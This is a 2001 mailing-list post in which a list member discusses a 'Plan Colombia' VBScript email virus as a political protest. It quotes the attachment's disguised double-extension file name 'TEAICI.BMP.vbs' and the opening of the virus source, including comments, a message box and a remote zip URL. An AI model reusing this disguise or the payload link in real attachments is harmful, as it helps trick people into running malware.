[spectre] columbian virus with the page of FBI secrets runs
__alejo duque
Sat, 15 Sep 2001 11:58:02 -0500
hi ana +list
i just checked about the virus, no one around has heard about it
here..its obviously an action against the "plan colombia" [U.S + E.U
monetary aid for the "war on drugs" in colombian ground], there are
lots of movements specially in europe that oppose to it..cause it's
more for the war than for social and fair solutions to the drugs
planetary problem [most of the times a party].....
in the other hand, i think is sort of danguerous to have those words
together..[lokombian, virus. etc] even though it looks like a
propaganda game for giving support to anti globalization movements in
the country---IPP---internet paranoic police---->>jammin'
echelon?? >> ;)
thaks for the info. it seems the first open attemp of electronic
civil disobedience via a virus in these country..guerrillas here
haven't been involved at all in campaigning through the internet..the
escenario is completely different from the zapatistas in mexico.
right now those groups [guerrila, autodefensas, narcos] are
considered by the U.S>>NATO as terrorist groups..what means what
anyone can expect, worldwide war against terrorism..pff
all those conflicts have a total lack of sense to me right now..is
impossible to understand anything after such brutallity.
>Dear all, especially to Alejo
>I have just recieved a message with the .vbs attachment and went to check
>out the properties, as it reports a virus. Message is
><= I couldn't survive so I went to check out the page.
>I think... virus. I still don't understand what it is and how it works,
>Content-Type: application/octet-stream;
> name="TEAICI.BMP.vbs"
>Content-Transfer-Encoding: quoted-printable
>Content-Disposition: attachment;
> filename="TEAICI.BMP.vbs"
>Text under it is also interesting:
>rem "Plan Colombia" virus v1.0=0A=
>rem by Sand Ja9e Gr0w (www.colombia.com)=0A=
>rem Dedicated to all the people that want to be hackers or crackers, in =
>Colombia =0A=
>rem This program is also a protest act against the violence and =
>corruption that Colombia lives...=0A=
>rem I always wanting that all this finishes, I have said...=0A=
>rem Santa fe de Bogot=E1 2000/09=0A=
>rem I dedicate to all you the song "GoodBye" of Andreas Bochelli=0A=
>rem Thanks God..!=0A=
>rem A greeting for "Lina Mar=EDa" from "Santa fe de Bogot=E1"=0A=
>rem A greeting for "Tizo" from "Spain"=0A=
>rem And One kicked of tail to my friends, "eL ChE" and "ThE SpY"=0A=
>rem okay, ok... =0A=
>rem my baby start here...=0A=
>MsgBox "Dedicated to my best brother=3D>Christiam Julian(C.J.G.S.)" & =
> Page","http://members.fortunecity.com/plancolombia/macromedia32.zip"=0A=
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